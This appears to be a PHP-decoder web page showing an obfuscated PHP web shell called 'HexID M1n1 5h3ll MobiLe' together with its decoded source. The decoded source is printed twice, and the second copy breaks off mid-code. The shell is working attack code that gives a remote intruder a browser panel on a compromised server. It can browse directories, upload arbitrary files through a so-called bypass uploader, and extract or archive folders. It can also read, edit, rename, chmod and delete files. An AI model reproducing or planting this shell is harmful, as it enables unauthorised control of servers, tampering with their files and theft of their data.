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PHP Decode
<?php goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W:..
Decoded Output download
goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W: goto BozPb; IR4it: e3g6Z: goto zuRmu; VUOHb: goto ZA20W; goto KyeiS; dd2X3: dMZLI: goto eDE58; pmRhb: $ip = getenv("REMOTE_ADDR"); goto QyLNF; wZ_nc: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto b7dfR; zuRmu: if (!(strtotime($awal) <= time() and time() >= strtotime($expired))) { function write($content, $dir) { $fh = fopen($dir, "w"); if (fwrite($fh, $content)) { return "1"; } else { return "0"; } fclose($fh); } function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } function alert($msg) { print "<script>alert('" . $msg . "');</script>"; } function kabur($dir) { print "<script>window.location='" . $dir . "';</script>"; } function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B><b>Not.Writable</b></font>"; } else { return "<font color=lime><b>Writable</b></font>"; } } function r($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } echo "
<!DOCTYPE HTML>\xa<html>
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<center><!--<p class="blink_text" style="font-size:45px;
color:white;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Iceland;">-->\xa\xa
<a href="?home"><font face="New Rocker" size="5" style="color:black;text-shadow: 0 0 3px lime, 0px 0px 5px lime,0 0 5px lime,0 0 5px lime;"><b>HexID M1n1 5h3ll MobiLe </a></font></br></b>"; if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($dir); } else { $dir = getcwd(); } echo "<table style="border: 1px solid lime;border-radius: 5px;background: #01111;" width="100%" border="0" cellpadding="3" cellspacing="1">"; echo "<tr><td><center><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&zip=menu'><font color=lime>Zip Archiver</font></a> ]</font>"; echo "<tr><td><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&upmod=upmenu'><font color=lime>Upmod</font></a> ]</font></center>"; if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { $message = "<font color="white">File Upload : </font><font color=lime><b>Done Successfully</b></font>"; } else { $message = "<font color="red"><b>Failed Dir Not Writeable :(</b></font></center>"; } } echo "<form enctype="multipart/form-data" method="POST">"; echo "<br><center><input class="kan" type="file" name="file" /><font color=black>llllll</font><input class="kan" type="submit" value="upload" />\xa</center>"; if ($message) { echo "{$message}"; } echo "</form></font></table>"; echo "
<pre id="pre" style="text-align: left;overflow:auto;
margin:0 auto;
word-wrap:break-word;\xaborder: 1px solid lime;\xaborder-top: black;\xacolor:lime;
background-color: darkslategrey;\xadirection:ltr;">\xa
"; $path = str_replace("\", "/", $path); $paths = explode("/", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<font size="2" face="New Rocker"><a href="?path=/"><b>" . r($dir, Dir) . "</b>:/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } echo "<font color=#0111111>_</font><b><font color=white>[ </font></b>" . w($dir, $perms) . "<b><font color=white> ]</font></b>"; echo "</font></pre><!--<hr color="green" style="margin-top:0;">-->"; if (isset($_FILES["zip_file"]["name"])) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { alert("File type cant zip"); kabur("?option&path={$path}&hexid=ziper"); } $pathx = $path . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $pathx . $filenoext; $targetzip = $pathx . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($pathx); $zip->close(); unlink($targetzip); } $message = "<font color=lime><b>Unzip Succesfully</b></font>"; } else { $message = "<font color=red><b>Unzip Failed!!</b></font>"; } } if ($_GET["upmod"] == "upmenu") { echo "<br><font color="green"><b>Special Premium Bypass Uploader He☠id</b></font><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" size="50"><font color="black">llll</font><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; $rootPath = $_SERVER["DOCUMENT_ROOT"]; $thisPath = dirname($_SERVER["PHP_SELF"]); $pathz = str_replace($rootPath, " ", $thisPath); $dir = dirname("mystring/and/path.txt") . DIRECTORY_SEPARATOR; $pathxz = dirname(__FILE__); if ($pathz == '' || $pathz == "/" || $pathz == "\") { } if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { $web = "http://" . $_SERVER["SERVER_NAME"] . $pathxz . "/" . basename($_FILES["file"]["name"]) . ''; echo "Go <font size='2px'>➩ <a href='{$web}' target='_blank'><b><u>{$web}</font></u></b></a>"; echo "<br>Author : Tex7ure || <font color="magenta">Hillusion Exploit ID ☠</b></font> </tr></td></table><br><br>"; } else { echo "<b><font color="red">Upload Failed !!!</font></b><br><br>"; } } } if ($_GET["zip"] == "menu") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>
<font face='New Rocker' size='5'> [<font color='lime'> Zip Archiver </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'>
<br>\xa<font face='New Rocker' size='2'>\xa[ <a href='?option&path={$path}&auto=unzip'><font color=lime>Auto Unzip File</font></a> ]\xa
[ <a href='?option&path={$path}&zip=backup'><font color=lime>Zip Backup</font></a> ]\xa
[ <a href='?option&path={$path}&unzip=manual'><font color=lime>UnZip Manual</font></a> ]
</b>\xa\xa</font></td></center></table>"; } if ($_GET["auto"] == "unzip") { echo "<br><table style="border:1px solid lime;border-radius:2px;width:100%;"><td><center>\xa\xa
<font face="New Rocker" size="5"> [<font color="lime"> Auto Unzip File </font>]</font>
<hr color="green" style:"margin-top:0;padding:0;"></center><form enctype="multipart/form-data" method="post" action="">"; echo "Zip File : "; if ($message) { echo "{$message}"; } echo "<br><br><input class="kan" type="file" name="zip_file" /><font color=#0111111>llllllll</font>
<input class="kan" type="submit" name="submit" value="Unzip" />
</form></table><br>"; if ($message) { echo "
<br><br><center><a href='?path=" . $path . "'>[ <font color=lime>Back to home</font> ]</a></center></font>"; } } if ($_GET["zip"] == "backup") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>\xa
<font face='New Rocker' size='5'> [<font color='lime'> Zip Backup </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'></center>
"; echo "\xa<br><form action='' method='post'><center>
<font style='text-decoration: underline;'>Folder: </font>\xa<input type='text' name='dir' value='{$dir}' style='width: 300px;margin:5px auto;' height='10'>\xa\xa<br><font style='text-decoration: underline;'>Save To:</font> <input type='text' name='save' value='{$dir}/' style='width: 300px;margin:5px auto;' height='10'>\xa
<br><input class='kan' type='submit' name='backup' value='BackUp!' style='width: 215px;'></center></form></center></td></table>"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "<pre style='text-align: left;overflow:auto;
margin:5px auto;
word-break:break-all;\xaword-wrap:break-word;\xaborder: 1px solid white;\xaborder-radius:6px;\xaborder-right:black;
background-color:darkslategray;\xadirection:ltr;'><font color=lime>Done Succesfully</font>, Save To: <b> {$save} </b></pre><br>"; } } if ($_GET["unzip"] == "manual") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>
\xa<font face='New Rocker' size='5'> [<font color='lime'> UnZip Manual </font>]</font>
<hr color='green' style:'margin-top:0;padding:0;'>
"; echo "<form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dird' value='{$dir}/' style='width: 300px;margin:5px auto;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='{$dir}/hexid_unzip' style='width: 300px;margin:5px auto;' height='10'><br><input class='kan' type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form></center>"; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dird"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "</td></table><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;\xamargin-top:5px;
border: 1px solid white;\xaborder-radius:6px;
direction:ltr;'><font color=lime>Done Succesfully</font>, Location: <b>{$save}</b></pre>"; } else { echo "<hr style='margin-bottom:0;'><font color=red><b><center>Unzip Failed</center></b></font><hr style='margin-top:0;'>"; } } } if (isset($_GET["exit"])) { session_destroy(); alert("Thanks to use my project HexID M1n1 5h3ll Copyright 2019 Tex7ure - Hillusion Exploit ID"); kabur("?home"); } if (isset($_GET["filesrc"])) { echo "<br><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;
border: 1px solid white;
direction:ltr;'><font size='2' color='lime'>File:"; echo $_GET["filesrc"]; echo "</pre></font>"; $html = htmlspecialchars(file_get_contents($_GET["filesrc"])); echo "<from><center><textarea cols=42 rows=20 style='onfocus();color:white;background: #011111;border-radius:6px;border: 1px lime solid;' readonly>" . $html . "</textarea></center></from>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { alert("Change Permission Success"); } else { alert("Change Permission Failed"); } } echo "<form method="POST">\xaPermission : <input class="kan" name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="opt" value="chmod">
<input class="kan" type="submit" value="Go" />
</form>"; } elseif ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { alert("Rename Success"); kabur("?path={$path}"); } else { alert("Rename Failed"); } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">New Name : \xa<input class="kan" name="newname" type="text" size="20" value="" . $_POST["name"] . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="rename">\xa<input class="kan" type="submit" value="Save" />
</form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<table style="background: #011111;border-radius:6px;border: 1px lime solid;" width="100%" align="center"><td>"; echo "<font color="lime">Success Edit File</font><br/>"; } else { echo "<font color="red">Failed Edit File</font><br/></table>"; } fclose($fp); } echo "<form method="POST">
<textarea class="colz" cols=42 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />
\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa<input type="hidden" name="opt" value="edit">
<input class="kan" style="width:99%" type="submit" value="Save" />
</form></table>"; } echo "</center>"; } else { echo "<br/><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if (rmdir($_POST["path"])) { alert("The directory has been deleted :v"); } else { alert("Directory failed to delete :D"); } } elseif ($_POST["type"] == "file") { if (unlink($_POST["path"])) { alert("The file has been deleted :v"); } else { alert("File failed to delete :D"); } } } echo "</center>"; $scandir = scandir($path); echo "<div id="content"><table style="direction:ltr;overflow:auto;page-break-inside:avoid;background: #011111;border-radius:6px;border: 1px lime solid;" width="100%" cellpadding="2" align="center">\xa<tr class="first">
<td><center>Prmisn</center></td>\xa<td><center>Modify</center></td>\xa</tr>"; foreach ($scandir as $dir) { if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr><td><img src="" width="6%"> <a href="?path=" . $path . "/" . $dir . "">" . $dir . "</a></td>
<td><center>-</center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $dir)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $dir)) { echo "<font color="red">"; } echo perms($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font>"; } echo "</center></font></td><td>
\xa\xa<center><form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>\xa</select>
\xa<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="" . $dir . "">\xa<input type="hidden" name="path" value="" . $path . "/" . $dir . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; foreach ($scandir as $file) { if (!is_file($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr><td>
<img src="" width="6%">
<!--<font size="3">-->\xa <a href="?filesrc=" . $path . "/" . $file . "&path=" . $path . "">" . $file . "</a>
<font size="1">" . $size . "</font></center></td>\xa<td><center><font size="1">"; if (is_writable($path . "/" . $file)) { echo "<font color="lime">"; } elseif (!is_readable($path . "/" . $file)) { echo "<font color="red">"; } echo perms($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</font>"; } echo "</center></font></td><td><center>
\xa\xa\xa<form method="POST" action="?option&path=" . $path . "">\xa<select class="kan" style="width: 40%;" name="opt">
<option value="">#</option>\xa<option value="delete">Delete</option>\xa<option value="chmod">Chmod</option>\xa<option value="rename">Rename</option>
<option value="edit">Edit</option>
\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="" . $file . "">
<input type="hidden" name="path" value="" . $path . "/" . $file . "">
<input class="kan" type="submit" value=">">
</form></center></td>\xa</tr>"; } echo "</table></div>"; } echo "<br/><center><table bordercolor="lime" style="border-radius:4px;width:92%;" align="center"><td>\xa
<b><center><a href="?exit">Copyright</a> © " . date("Y") . " - <a href="mailto:[email protected]"><font color="lime">Tex7ure</a></font> | <a href=" Exploit ID" target="_blank"><font face="New Rocker" size="2">Hillusion Exploit ID</a></font>
\xa</body>\xa</html>"; } else { echo "<html><head>\xa<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no'></head>
<style>\xabody {\xa background: black;
font-family: iceland;
color: white;
<center> <font color=lime><b>[!] Warning [!]</b><br>"; date_default_timezone_set("Asia/Jakarta"); $anj = date("Y-m-d"); echo "<table border="1" bordercolor="lime" align="center">\xa<tr><td>"; echo "\xa<font color=white>Your Access Expired<td><font color=white>Date. In : <font color=lime><b>{$anj} </b></td></tr><tr><td><font color=white>Regist : <font color=lime><b>{$awal}</b><td><font color=white>Expired : <font color=lime><b>{$expired} </b></td></table></center>"; } goto Uogfg; BozPb: $expired = date("2024-01-21"); goto QZTPI; eDE58: error_reporting(0); goto VUOHb; Qvgw3: ZeahE: goto cFKiU; og3XE: l20Ep: goto wZ_nc; KyeiS: MAZ_m: goto pmRhb; Uogfg: goto MAZ_m; goto dd2X3; b7dfR: goto ZeahE; goto IR4it; bq_a0: goto dMZLI; goto efDM ?>
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goto bq_a0; efDM6: ZA20W: goto Scy9A; maD4I: goto hrf5W; goto og3XE; qKjNm: hrf5W: goto BozPb; IR4it: e3g6Z: goto zuRmu; VUOHb: goto ZA20W; goto KyeiS; dd2X3: dMZLI: goto eDE58; pmRhb: $ip = getenv("REMOTE_ADDR"); goto QyLNF; wZ_nc: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto b7dfR; zuRmu: if (!(strtotime($awal) <= time() and time() >= strtotime($expired))) { function write($content, $dir) { $fh = fopen($dir, "w"); if (fwrite($fh, $content)) { return "1"; } else { return "0"; } fclose($fh); } function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } function alert($msg) { print "<script>alert('" . $msg . "');</script>"; } function kabur($dir) { print "<script>window.location='" . $dir . "';</script>"; } function w($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B><b>Not.Writable</b></font>"; } else { return "<font color=lime><b>Writable</b></font>"; } } function r($dir, $perm) { if (!is_writable($dir)) { return "<font color=#FF706B>" . $perm . "</font>"; } else { return "<font color=lime>" . $perm . "</font>"; } } echo "
<!DOCTYPE HTML>\xa<html>
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<center><!--<p class="blink_text" style="font-size:45px;
color:white;text-shadow: 0px 0px 20px #00ffff , 0px 0px 20px #00ffff;font-family:Iceland;">-->\xa\xa
<a href="?home"><font face="New Rocker" size="5" style="color:black;text-shadow: 0 0 3px lime, 0px 0px 5px lime,0 0 5px lime,0 0 5px lime;"><b>HexID M1n1 5h3ll MobiLe </a></font></br></b>"; if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($dir); } else { $dir = getcwd(); } echo "<table style="border: 1px solid lime;border-radius: 5px;background: #01111;" width="100%" border="0" cellpadding="3" cellspacing="1">"; echo "<tr><td><center><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&zip=menu'><font color=lime>Zip Archiver</font></a> ]</font>"; echo "<tr><td><font face="New Rocker" size="2">"; echo "[ <a href='?option&path={$path}&upmod=upmenu'><font color=lime>Upmod</font></a> ]</font></center>"; if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { $message = "<font color="white">File Upload : </font><font color=lime><b>Done Successfully</b></font>"; } else { $message = "<font color="red"><b>Failed Dir Not Writeable :(</b></font></center>"; } } echo "<form enctype="multipart/form-data" method="POST">"; echo "<br><center><input class="kan" type="file" name="file" /><font color=black>llllll</font><input class="kan" type="submit" value="upload" />\xa</center>"; if ($message) { echo "{$message}"; } echo "</form></font></table>"; echo "
<pre id="pre" style="text-align: left;overflow:auto;
margin:0 auto;
word-wrap:break-word;\xaborder: 1px solid lime;\xaborder-top: black;\xacolor:lime;
background-color: darkslategrey;\xadirection:ltr;">\xa
"; $path = str_replace("\", "/", $path); $paths = explode("/", $path); foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<font size="2" face="New Rocker"><a href="?path=/"><b>" . r($dir, Dir) . "</b>:/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $pat . "</a>/"; } echo "<font color=#0111111>_</font><b><font color=white>[ </font></b>" . w($dir, $perms) . "<b><font color=white> ]</font></b>"; echo "</font></pre><!--<hr color="green" style="margin-top:0;">-->"; if (isset($_FILES["zip_file"]["name"])) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { alert("File type cant zip"); kabur("?option&path={$path}&hexid=ziper"); } $pathx = $path . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $pathx . $filenoext; $targetzip = $pathx . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($pathx); $zip->close(); unlink($targetzip); } $message = "<font color=lime><b>Unzip Succesfully</b></font>"; } else { $message = "<font color=red><b>Unzip Failed!!</b></font>"; } } if ($_GET["upmod"] == "upmenu") { echo "<br><font color="green"><b>Special Premium Bypass Uploader He☠id</b></font><br><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" size="50"><font color="black">llll</font><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; $rootPath = $_SERVER["DOCUMENT_ROOT"]; $thisPath = dirname($_SERVER["PHP_SELF"]); $pathz = str_replace($rootPath, " ", $thisPath); $dir = dirname("mystring/and/path.txt") . DIRECTORY_SEPARATOR; $pathxz = dirname(__FILE__); if ($pathz == '' || $pathz == "/" || $pathz == "\") { } if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { $web = "http://" . $_SERVER["SERVER_NAME"] . $pathxz . "/" . basename($_FILES["file"]["name"]) . ''; echo "Go <font size='2px'>➩ <a href='{$web}' target='_blank'><b><u>{$web}</font></u></b></a>"; echo "<br>Author : Tex7ure || <font color="magenta">Hillusion Exploit ID ☠</b></font> </tr></td></table><br><br>"; } else { echo "<b><font color="red">Upload Failed !!!</font></b><br><br>"; } } } if ($_GET["zip"] == "menu") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>
<font face='New Rocker' size='5'> [<font color='lime'> Zip Archiver </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'>
<br>\xa<font face='New Rocker' size='2'>\xa[ <a href='?option&path={$path}&auto=unzip'><font color=lime>Auto Unzip File</font></a> ]\xa
[ <a href='?option&path={$path}&zip=backup'><font color=lime>Zip Backup</font></a> ]\xa
[ <a href='?option&path={$path}&unzip=manual'><font color=lime>UnZip Manual</font></a> ]
</b>\xa\xa</font></td></center></table>"; } if ($_GET["auto"] == "unzip") { echo "<br><table style="border:1px solid lime;border-radius:2px;width:100%;"><td><center>\xa\xa
<font face="New Rocker" size="5"> [<font color="lime"> Auto Unzip File </font>]</font>
<hr color="green" style:"margin-top:0;padding:0;"></center><form enctype="multipart/form-data" method="post" action="">"; echo "Zip File : "; if ($message) { echo "{$message}"; } echo "<br><br><input class="kan" type="file" name="zip_file" /><font color=#0111111>llllllll</font>
<input class="kan" type="submit" name="submit" value="Unzip" />
</form></table><br>"; if ($message) { echo "
<br><br><center><a href='?path=" . $path . "'>[ <font color=lime>Back to home</font> ]</a></center></font>"; } } if ($_GET["zip"] == "backup") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>\xa
<font face='New Rocker' size='5'> [<font color='lime'> Zip Backup </font>]</font>\xa<hr color='green' style:'margin-top:0;padding:0;'></center>
"; echo "\xa<br><form action='' method='post'><center>
<font style='text-decoration: underline;'>Folder: </font>\xa<input type='text' name='dir' value='{$dir}' style='width: 300px;margin:5px auto;' height='10'>\xa\xa<br><font style='text-decoration: underline;'>Save To:</font> <input type='text' name='save' value='{$dir}/' style='width: 300px;margin:5px auto;' height='10'>\xa
<br><input class='kan' type='submit' name='backup' value='BackUp!' style='width: 215px;'></center></form></center></td></table>"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "<pre style='text-align: left;overflow:auto;
margin:5px auto;
word-break:break-all;\xaword-wrap:break-word;\xaborder: 1px solid white;\xaborder-radius:6px;\xaborder-right:black;
background-color:darkslategray;\xadirection:ltr;'><font color=lime>Done Succesfully</font>, Save To: <b> {$save} </b></pre><br>"; } } if ($_GET["unzip"] == "manual") { echo "<br><table style='border:1px solid lime;border-radius:2px;width:100%;'><td><center>
\xa<font face='New Rocker' size='5'> [<font color='lime'> UnZip Manual </font>]</font>
<hr color='green' style:'margin-top:0;padding:0;'>
"; echo "<form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dird' value='{$dir}/' style='width: 300px;margin:5px auto;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='{$dir}/hexid_unzip' style='width: 300px;margin:5px auto;' height='10'><br><input class='kan' type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form></center>"; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dird"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "</td></table><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;\xamargin-top:5px;
border: 1px solid white;\xaborder-radius:6px;
direction:ltr;'><font color=lime>Done Succesfully</font>, Location: <b>{$save}</b></pre>"; } else { echo "<hr style='margin-bottom:0;'><font color=red><b><center>Unzip Failed</center></b></font><hr style='margin-top:0;'>"; } } } if (isset($_GET["exit"])) { session_destroy(); alert("Thanks to use my project HexID M1n1 5h3ll Copyright 2019 Tex7ure - Hillusion Exploit ID"); kabur("?home"); } if (isset($_GET["filesrc"])) { echo "<br><pre style='text-align: left;overflow:auto;
page-break-inside:avoid;\xadisplay:block;\xamargin:5px auto;
border: 1px solid white;
direction:ltr;'><font size='2' color='lime'>File:"; echo $_GET["filesrc"]; echo "</pre></font>"; $html = htmlspecialchars(file_get_contents($_GET["filesrc"])); echo "<from><center><textarea cols=42 rows=20 style='onfocus();color:white;background: #011111;border-radius:6px;border: 1px lime solid;' readonly>" . $html . "</textarea></center></from>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "chmod") { if (isset($_POST["perm"])) { if (chmod($_POST["path"], $_POST["perm"])) { alert("Change Permission Success"); } else { alert("Change Permission Failed"); } } echo "<form method="POST">\xaPermission : <input class="kan" name="perm" type="text" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa<input type="hidden" name="path" value="" . $_POST["path"] . "">
<input type="hidden" name="opt" value="chmod">
<input class="kan" type="submit" value="Go" />
